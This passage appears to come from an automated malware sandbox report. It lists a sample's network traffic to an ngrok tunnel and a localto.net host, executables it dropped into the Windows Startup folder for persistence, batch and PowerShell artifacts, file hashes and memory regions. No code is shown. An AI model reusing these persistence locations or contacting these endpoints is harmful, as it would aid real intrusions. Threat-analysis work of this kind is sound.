| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 18.192.31.165:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| US | 8.8.8.8:53 | br1.localto.net | udp |
| DE | 3.125.209.94:12586 | 0.tcp.eu.ngrok.io | tcp |
Files
memory/4264-0-0x00000000003B0000-0x00000000005F0000-memory.dmp
memory/4264-1-0x00007FFF07973000-0x00007FFF07975000-memory.dmp
memory/4264-2-0x000000001B2D0000-0x000000001B520000-memory.dmp
C:\Windows\Temp\explorer.exe
| MD5 | 645c4a1777edc25cbf67a5a5945e3311 |
| SHA1 | 4985ee60a642ecf0be9b60ab137f30d388c2f9f8 |
| SHA256 | f5557bd3226c5973126b6dd4f2b6cf17b672482b38a77dd995ef1e52958b671c |
| SHA512 | 999d55213a7c8cfbdebcffde20e8143113940fc350342e88c3f53f839a0bb39786327bcfe40cc9ea9c5f4e98b94ba4302e8f925e1263e5e05007686e05004775 |
memory/4264-8-0x00007FFF07970000-0x00007FFF08431000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UPDATE.exe
| MD5 | 3a7327b010d7f41fdb759fdbaf8134bf |
| SHA1 | ddb00f2c736bad53e82f1ef69919314aaf888131 |
| SHA256 | 519a0fb3e4753c330054153fc8813bbfbac63c7ce32afe110c5dc558ec6909fa |
| SHA512 | 8abfb42add40eadae4aaf5f04edb989f79e6f2d7b080064d488852654f4c17ec08a16cfcfa3947dbf6bf721f113487ef781492d40b281a9a9810946430fd9f90 |
memory/5068-32-0x0000000000BD0000-0x0000000000F7E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer .exe
| MD5 | 570c5c4f037ad11d8e3e51d2e9cf5be0 |
| SHA1 | 0f7e2478ef2741f3e6460bf6b5fa6c135a6c0fc8 |
| SHA256 | 0c2b77e6f72dd5736aafaddc75cdee19cde2bd621d0c0c93aae517a29de4e237 |
| SHA512 | 3e5243394ec602098dd11ef77f3ddc0b51d01a8a1ffd829f29b31c237f5e9cf3c011463e619fdc6206bfbee6f0cf43fb681392fd9e1bd35a186e8a059b0beae5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.exe
| MD5 | 799ce66446d07f987d0e84e50bac4e1f |
| SHA1 | 957f18dd1e9047b36c504752fea23b489dd7c4ae |
| SHA256 | 29eb1c9a192e737c103da9f99ca3e8ed722fe36d5c3073be006867bb0dc58ca2 |
| SHA512 | edd9d33a7fcb765eee0a32a468ac3418f6c23976395b753becafc7bdac160970b89884500d626c5f1476a54f8a3e25bd749c51b956de6ac546efa93a468842de |
memory/3316-44-0x0000000000980000-0x0000000000BB8000-memory.dmp
memory/5068-43-0x0000000000BD0000-0x0000000000F7E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5748.tmp\hide.bat
| MD5 | fdc8f1d8d7b410678433976973ea8e76 |
| SHA1 | 1572ec51ef38b39e4702f993a25cf1cbb5914fda |
| SHA256 | 462648eaf83a1385b957078d3ee40e5c1ffcc00f80cee3456c02a38d992f0c7b |
| SHA512 | b8c6dd7ba66a0867c3fbc8bcacd1ac9fb67e9548174258ca1f7363ca95d3c39771c12cb0b4d121f0d1e9fe6208c00f21c47fb9a4d100351706fb5e0e1f4bcf1e |
memory/2832-50-0x00000000026C0000-0x00000000026F6000-memory.dmp
memory/2832-51-0x0000000005330000-0x0000000005958000-memory.dmp
memory/2832-52-0x00000000050A0000-0x00000000050C2000-memory.dmp
memory/2832-53-0x00000000052C0000-0x0000000005326000-memory.dmp
memory/2832-54-0x0000000005960000-0x00000000059C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vxwgv150.ufi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2832-64-0x00000000059D0000-0x0000000005D24000-memory.dmp
memory/2832-65-0x0000000005FE0000-0x0000000005FFE000-memory.dmp
memory/2832-66-0x0000000006020000-0x000000000606C000-memory.dmp
memory/2832-67-0x0000000006FA0000-0x0000000006FD2000-memory.dmp
memory/2832-68-0x0000000073B00000-0x0000000073B4C000-memory.dmp
memory/2832-78-0x00000000065C0000-0x00000000065DE000-memory.dmp
memory/2832-79-0x00000000071E0000-0x0000000007283000-memory.dmp
memory/2832-81-0x0000000007330000-0x000000000734A000-memory.dmp
memory/2832-80-0x0000000007970000-0x0000000007FEA000-memory.dmp
memory/2832-82-0x00000000073A0000-0x00000000073AA000-memory.dmp
memory/2832-83-0x00000000075B0000-0x0000000007646000-memory.dmp
memory/2832-84-0x0000000007520000-0x0000000007531000-memory.dmp
memory/2832-85-0x0000000007550000-0x000000000755E000-memory.dmp
memory/2832-86-0x0000000007560000-0x0000000007574000-memory.dmp
memory/2832-87-0x0000000007650000-0x000000000766A000-memory.dmp
memory/2832-88-0x0000000007590000-0x0000000007598000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 960561607092b84818eb3b56a7312462 |
| SHA1 | 1e66c8efa39d2bdaac13e133072d98fbdba44877 |
| SHA256 | c3318e5c97eb053791061b68c65a65060c28fa2c1f8479cdaca46529ea0c19ef |
| SHA512 | d23a10386d6a716bd4b0ea3822cd5eb436c8b30f99ec16eae6661be198db162a1032937ff4377af997ac7a9004f814f8c4170329808e11c13efc4b370716aa77 |
memory/4384-102-0x0000000073B00000-0x0000000073B4C000-memory.dmp
memory/5032-113-0x0000000005670000-0x00000000059C4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a62368686a6932cf3b5df2c7069bcb36 |
| SHA1 | f5ce38c79eeb40e85f67b44fb66394222cd16378 |
| SHA256 | 74896ad97b59cce4415968f3e1199dee39547c95e5c1ae05357faec8af60f79b |
| SHA512 | e22eae268e522ee1c64cf0b7f538439e324a7aedcc759122436230fa97f28dfbad6bb557e25610845ea9d59bcae137861aaef711647ba14913d85c4d507a6314 |
memory/5032-124-0x0000000073B00000-0x0000000073B4C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 19134fc9400eec71d9f74a0c79f2dffd |
| SHA1 | dd21822c12f5ef22c0a7e265ef728590824aea5f |
| SHA256 | 55819c92c9b58551d3e01c2a2868e58d1e4619fb14da46182e5accaa886e6501 |
| SHA512 | d56a53cdf522c679b1a0d759c08612212f421f412a1607bbe5a107bd1832f5ad46178c2a2baa0172233e5608e4abb7590b0d6c5ede9257f0cfd267aaf70d26ee |
memory/1656-145-0x0000000073B00000-0x0000000073B4C000-memory.dmp
memory/5068-162-0x0000000000BD0000-0x0000000000F7E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp9635.tmp.bat
| MD5 | 33d6fa6f6e2e2bdd1803dedbde9ed3cf |
| SHA1 | 6d8870a57d572a77ff40caf46673ce77634b6df8 |
| SHA256 | a7e9583d5608f894a2ebf5af1f5d5d62fa01865aaabb70b51b8d7630bf8aebad |
| SHA512 | c2d05de7d63477ad0e5dea4bd8698fb36a7eb6e86fcbfa086ba12fe723e62b345d9f4a41bef928d9ea6464872d1d30a343b842284d4076e4363682b74b45312d |
memory/3920-167-0x0000000000FD0000-0x000000000137E000-memory.dmp
memory/3920-168-0x0000000000FD0000-0x000000000137E000-memory.dmp
memory/4264-169-0x00007FFF07970000-0x00007FFF08431000-memory.dmp
memory/3920-172-0x0000000000FD0000-0x000000000137E000-memory.dmp